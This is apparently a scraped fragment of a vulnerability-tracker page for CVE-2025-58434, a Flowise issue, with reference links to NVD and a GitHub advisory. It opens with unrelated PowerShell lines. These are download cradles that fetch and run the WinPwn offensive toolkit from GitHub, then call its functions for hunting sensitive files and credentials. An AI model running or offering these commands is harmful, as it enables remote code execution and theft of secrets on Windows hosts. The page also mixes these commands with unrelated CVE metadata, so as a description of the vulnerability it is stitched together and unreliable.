iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-58434 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wgpv-6j63-x5ph |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/FlowiseAI/Flowise/commit/9e178d68873eb876073846433a596590d3d9c863 |